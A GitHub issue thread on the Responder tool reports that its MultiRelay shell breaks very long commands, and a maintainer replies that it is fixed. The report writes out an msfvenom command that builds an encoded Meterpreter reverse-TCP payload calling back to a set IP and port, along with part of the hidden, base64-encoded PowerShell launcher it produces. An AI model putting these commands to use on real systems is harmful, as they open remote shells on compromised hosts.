### ISSUE TITLE
MultiRelay: very long shell commands parsing issue

### ISSUE THREAD

**Issue by ghelm** [lgandx/Responder#40]
Hi there,

if I try to use a meterpreter powershell payload inside the MultiRelay shell, strange things start to happen :)

Example:
#Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.178 LPORT=4444 -e x86/shikata_ga_nai -f psh-cmd

#msfvenom output with a length of  6447 chars in total:
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA
...
QAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

- If I just paste it into the shell, my payload will be cut into several pieces and fed to the client resulting in no compromised host.

- If I specify the payload inside the -c parameter, MultiRelay will crash with the Message "Something went wrong"

I could set up a http server to get the file with powershell, but it would definitely be nice if I could just throw the payload inside the shell.

Thanks for looking into this.

**Comment by lgandx** [comment]
Thanks for your report, this has been fixed and will be pushed in the next version :)
